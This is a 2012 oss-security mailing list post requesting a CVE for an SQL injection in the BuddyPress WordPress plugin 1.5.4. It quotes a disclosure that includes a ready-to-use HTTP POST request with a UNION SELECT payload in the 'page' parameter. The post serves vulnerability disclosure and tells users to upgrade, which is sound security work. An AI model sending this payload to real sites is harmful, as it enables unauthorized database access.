Date: Sun, 15 Apr 2012 12:05:37 +0300 From: Henri Salo <henri@...v.fi> To: oss-security@...ts.openwall.com Subject: CVE-request: WordPress BuddyPress-plugin SQL-injection 1.5.4 Hello, Can I get 2012 CVE-identifier for WordPress BuddyPress-plugin SQL-injection. Affected: 1.5.4 Fixed: 1.5.5 Vendor: http://buddypress.org/2012/03/buddypress-1-5-5/ OSVDB: http://osvdb.org/show/osvdb/80763 Changelog: http://codex.buddypress.org/releases/version-1-5/ (doesn't seem to say about this issue) http://seclists.org/bugtraq/2012/Apr/4 """ Hi, I would like disclosure SQL injection vulnerability if Buddypress plugin affecting last versions. This issue was reported to developers and resolved in 1.5.5 version. So, I suggest all having this plugin in their blogs update to last version, if you haven't done it yet. Example of POST message with sql injection is below. POST /wp-load.php HTTP/1.1 User-Agent: Mozilla Host: example.com Accept: */* Referer: http://example.com/activity/?s=b Connection: Keep-Alive Content-Length: 153 Content-Type: application/x-www-form-urlencoded action=activity_widget_filter&page=1%26exclude%3d1)and(1=0)UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17))%3b--+ """ - Henri Salo
Powered by blists - more mailing lists
Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.
Powered by Openwall GNU/*/Linux - Powered by OpenVZ